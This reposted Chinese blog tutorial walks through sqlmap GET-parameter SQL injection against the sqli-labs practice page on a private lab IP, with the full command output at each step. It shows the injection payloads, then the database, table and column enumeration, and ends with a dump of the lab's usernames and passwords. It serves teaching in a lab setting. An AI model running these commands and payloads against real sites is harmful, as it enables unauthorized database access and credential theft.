Sqlmap是如何GET注入的
Posted web安全工具库
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Sqlmap是如何GET注入的相关的知识,希望对你有一定的参考价值。
人有时候会突然不快乐了
突然被记忆力的某个细节揪住
突然陷入深深的沉默。。。
---- 网易云热评
一、监测是否存在注入
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"
运行结果:id存在注入,可能存在的类型:报错注入、布尔盲注、时间盲注、联合注入
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3164=3164 AND 'mfxU'='mfxU
Type: error-based
Title: mysql >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(6170=6170,1))),0x7171707671),6170) AND 'OQBr'='OQBr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5125 FROM (SELECT(SLEEP(5)))KhmQ) AND 'FLCn'='FLCn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3273' UNION ALL SELECT NULL,CONCAT(0x7170787671,0x6749526d50674c70454d46764779685973766f45787156766e574b6b7244554c6d697559506b6d54,0x7171707671),NULL-- -
---
[12:46:50] [INFO] the back-end DBMS is MySQL
web application technology: nginx 1.15.11, php 5.4.45
back-end DBMS: MySQL >= 5.6
[12:46:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
二、获取数据库名称
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --dbs
运行结果:
[12:55:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[12:55:26] [INFO] fetching database names
available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
[*] www_dgdg_com
[*] www_zm_com
[12:55:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
三、获取表名
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security --tables
-D指定数据库名称
--tables获取表名
运行结果:
[12:58:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[12:58:52] [INFO] fetching tables for database: 'security'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[12:58:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
四、获取列名
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users --columns
-T指定表名
运行结果:
[13:01:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[13:01:32] [INFO] fetching columns for table 'users' in database 'security'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[13:01:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
五、获取字段内容
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users --dump "password,username"
运行结果:
[13:04:07] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[13:04:07] [INFO] fetching columns for table 'users' in database 'security'
[13:04:07] [INFO] fetching entries for table 'users' in database 'security'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+
[13:04:07] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'
[13:04:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
以上是关于Sqlmap是如何GET注入的的主要内容,如果未能解决你的问题,请参考以下文章